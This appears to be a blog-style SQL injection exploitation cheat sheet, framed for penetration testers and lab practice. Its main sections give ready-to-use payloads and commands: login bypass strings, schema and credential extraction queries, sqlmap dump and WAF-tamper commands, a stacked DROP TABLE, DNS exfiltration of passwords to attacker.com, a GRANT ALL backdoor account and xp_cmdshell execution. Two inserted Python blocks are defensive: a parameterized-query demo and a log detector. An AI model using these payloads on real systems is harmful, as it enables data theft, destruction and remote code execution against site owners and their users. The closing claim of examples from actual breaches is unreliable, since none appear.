Practical SQL Injection Exploitation Cheat Sheet - @verylazytech

Introduction
SQL Injection (SQLi) remains one of the most dangerous vulnerabilities in web applications, allowing attackers to manipulate databases, extract sensitive data, and even gain remote access. This cheat sheet focuses on real-world SQLi exploitation with hands-on examples, bypassing security filters, and using tools like Burp Suite and SQLMap.
Setting Up a Testing Environment
Before executing SQL injection attacks, set up a safe environment:
Damn Vulnerable Web App (DVWA) — Download Here
bWAPP (Buggy Web Application) — Download Here
HackTheBox or TryHackMe Labs
Ensure you have:
Burp Suite (for manual exploitation)
SQLMap (for automated attacks)
A vulnerable web application to practice
sql injection — @verylazytech
Step 1: Identifying SQL Injection Vulnerability
Manual Testing with Basic Payloads
In a login form, test with:
admin' OR '1'='1' --
If you get access without a correct password, it’s vulnerable.
Check for errors using:
' OR 1=1 --
" OR 1=1 --
' OR 'a'='a' --
If a database error comes back (e.g., a syntax error or an unclosed quotation), the input is reaching the query unescaped and the field is very likely vulnerable.
Using Burp Suite to Intercept Requests
Enable Burp Suite Proxy and intercept a login request.
Modify the username field to admin'--.
If authentication succeeds, SQLi is present.
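Added example (not code from the original post): the login query behind Step 1, first as the string-concatenated version the payloads above break, then with bound parameters, run side by side against a throwaway SQLite database. The users table and its two rows are constructed for the demo. The same harness also shows the "only if multiple queries are allowed" caveat from Step 5: the stacked admin'; DROP TABLE users; -- payload is refused by the driver's single-statement execute(), so the table survives.

```python
import sqlite3


# Constructed stand-in for the login backend: an in-memory SQLite database
# with a users table shaped like the one the cheat sheet queries.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext passwords only to mirror the page's SELECT username, password
    # FROM users; a real application stores a salted hash instead.
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "pw")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-concatenated query: the pattern Step 1's payloads exploit."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except (sqlite3.Warning, sqlite3.Error):
        # A syntax error here is exactly the signal Step 1 looks for.
        # sqlite3's execute() also refuses a second statement in the same
        # call, which is why the stacked payload from Step 5 does nothing.
        return None
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the input is never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def table_exists(conn, name):
    """True if a table with this name still exists in the database."""
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    for user, pw in [("admin", "S3cret!"),
                     ("admin' OR '1'='1' --", "wrong"),
                     ("admin'; DROP TABLE users; --", "wrong")]:
        print(repr(user), "->",
              "vulnerable:", login_vulnerable(conn, user, pw),
              "| parameterized:", login_parameterized(conn, user, pw))
    print("users table still exists:", table_exists(conn, "users"))
```

The tautology payload logs in as admin through the concatenated query and returns nothing through the parameterized one, because the bound value is compared as a literal string. The stacked-query payload only fails here because the driver executes one statement per call; an application that feeds user input to a multi-statement API (sqlite3's executescript(), or a server that allows batching) would not get that protection, which is the point of the Step 5 caveat.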
Step 2: Extracting Database Information
Once confirmed vulnerable, extract database info using:
Determining Database Type
SELECT @@version; -- MySQL
SELECT version(); -- PostgreSQL
SELECT banner FROM v$version; -- Oracle
Enumerating Tables and Columns
SELECT table_name FROM information_schema.tables;
SELECT column_name FROM information_schema.columns WHERE table_name = 'users';
Extracting User Credentials
SELECT username, password FROM users;
Step 3: Automated Exploitation with SQLMap
SQLMap can automate SQL injection with simple commands.
Basic SQL Injection Scan
sqlmap -u "http://target.com/login.php?id=1" --dbs
Dumping User Credentials
sqlmap -u "http://target.com/login.php?id=1" -D database_name -T users --dump
Bypassing WAFs with Randomized Case Encoding
sqlmap -u "http://target.com/login.php?id=1" --tamper=between,randomcase
Step 4: Blind SQL Injection Exploitation
If no errors or output is displayed, blind SQLi can be used.
Time-Based Blind SQLi
' OR IF(1=1, SLEEP(5), 0) --
If the response is delayed, SQLi is confirmed.
Boolean-Based Blind SQLi
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END) --
If successful, the server responds differently based on the condition.
Step 5: Exploiting Advanced SQL Injection Techniques
Stacked Queries (Executing Multiple Statements)
admin'; DROP TABLE users; --
(Only works if multiple queries are allowed.)
Extracting Data via DNS Exfiltration
SELECT load_file(concat('\', (SELECT password FROM users LIMIT 1), '.attacker.com\file'));
(Useful when output is blocked.)
Privilege Escalation & OS Command Execution
MySQL User Escalation
SELECT user, host FROM mysql.user;
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'hacked';
(The IDENTIFIED BY clause in GRANT was removed in MySQL 8.0; on those versions this statement fails.)
Executing System Commands in MSSQL
EXEC xp_cmdshell 'whoami';
(Useful for Remote Code Execution.)
Step 6: Bypassing Security Filters & WAFs
Most web applications use WAFs (Web Application Firewalls) to detect SQLi. Here’s how to bypass them:
Encoding Payloads (Hex, Base64, URL Encoding)
SELECT username FROM users WHERE id=0x61646D696E; -- HEX encoding
SELECT username FROM users WHERE id=BASE64_DECODE('YWRtaW4='); -- base64 decoding; the function name is DBMS-specific (MySQL's is FROM_BASE64())
Using Comment Injection to Obfuscate Payloads
SELECT/**/username/**/FROM/**/users/**/WHERE/**/id/**/=1;
Randomized Case & White Space Manipulation
SeLeCt UsErNaMe FrOm UsErS WhErE iD=1;
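Added defender-side example (not code from the original post): the detection logic a WAF rule or log-analysis job needs so that the Step 6 tricks (URL encoding, hex literals, /**/ comment injection, randomized case) do not get past it, together with the default-User-Agent check for the sqlmap runs in Step 3 and a response-time check for the time-based probe in Step 4. The access-log lines are constructed; the trailing response-time-in-ms field assumes a custom LogFormat, and the sqlmap User-Agent line is modelled on the tool's default "sqlmap/<version> (https://sqlmap.org)" prefix.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format plus a trailing
# response-time-in-ms field). Not real traffic; IPs are from the 203.0.113.0/24
# documentation range.
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2024:10:00:01 +0000] "GET /login.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 118
203.0.113.11 - - [01/Jan/2024:10:00:02 +0000] "GET /login.php?id=1%27%20OR%201%3D1%20-- HTTP/1.1" 200 4096 "-" "Mozilla/5.0" 97
203.0.113.12 - - [01/Jan/2024:10:00:03 +0000] "GET /login.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)" 104
203.0.113.13 - - [01/Jan/2024:10:00:04 +0000] "GET /login.php?id=SeLeCt%2F%2A%2A%2FuSeRnAmE%2F%2A%2A%2FFrOm%2F%2A%2A%2FuSeRs HTTP/1.1" 500 230 "-" "Mozilla/5.0" 88
203.0.113.14 - - [01/Jan/2024:10:00:05 +0000] "GET /login.php?id=1%27%20OR%20IF(1%3D1%2CSLEEP(5)%2C0)%20-- HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5214
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<ms>\d+)$'
)

# Signatures are matched against the *normalized* request, never the raw one.
SIGNATURES = [
    ("tautology",    re.compile(r"\bor\s+(\d+|'[^']*'|\"[^\"]*\")\s*=\s*(\d+|'[^']*'|\"[^\"]*\")")),
    ("quote-break",  re.compile(r"['\"]\s*(or|and|;|--)")),
    ("select-from",  re.compile(r"\bselect\b.*\bfrom\b")),
    ("time-delay",   re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b")),
    ("schema-probe", re.compile(r"information_schema|@@version|\bversion\s*\(")),
    ("dangerous-fn", re.compile(r"\b(load_file|xp_cmdshell)\b")),
]


def _hex_to_text(hexdigits):
    """Turn a 0x.. literal back into text (e.g. 0x61646D696E -> admin)."""
    try:
        return bytes.fromhex(hexdigits).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return "0x" + hexdigits


def normalize(value):
    """Undo the Step 6 obfuscations so one signature set covers all variants."""
    prev = None
    while prev != value:                      # repeat: double-encoded input
        prev, value = value, unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)   # comment injection
    value = re.sub(r"0x([0-9a-fA-F]{2,})\b",
                   lambda m: _hex_to_text(m.group(1)), value)  # hex literals
    value = value.lower()                     # randomized case
    return re.sub(r"\s+", " ", value).strip() # whitespace manipulation


def analyze_line(line, slow_ms=3000):
    """Return {'ip', 'path', 'findings'} for a parsable line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = [name for name, rx in SIGNATURES if rx.search(normalize(m.group("path")))]
    if m.group("ua").lower().startswith("sqlmap/"):
        findings.append("scanner-ua")         # sqlmap's default User-Agent
    # A delay function in the request plus a slow response is the server-side
    # view of the Step 4 time-based probe.
    if "time-delay" in findings and int(m.group("ms")) >= slow_ms:
        findings.append("time-based-probe-confirmed")
    return {"ip": m.group("ip"), "path": m.group("path"), "findings": findings}


def scan(log_text):
    """All flagged requests in a log, in file order."""
    hits = (analyze_line(line) for line in log_text.splitlines())
    return [h for h in hits if h and h["findings"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["findings"], hit["path"])
```

Normalizing before matching is what makes the SeLeCt UsErNaMe and SELECT/**/username variants collapse into the same select username from users string, so a single signature covers them. The User-Agent check only catches default sqlmap runs (the tool's --random-agent option replaces it), and the response-time threshold should be tuned to the endpoint's normal latency before it is used for alerting.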
Conclusion
SQL Injection remains a high-impact vulnerability, but with proper understanding and hands-on practice, penetration testers can identify and exploit it effectively. This cheat sheet provided:
Step-by-step exploitation techniques
Real-world SQLi payloads
WAF bypassing strategies
Examples from actual security breaches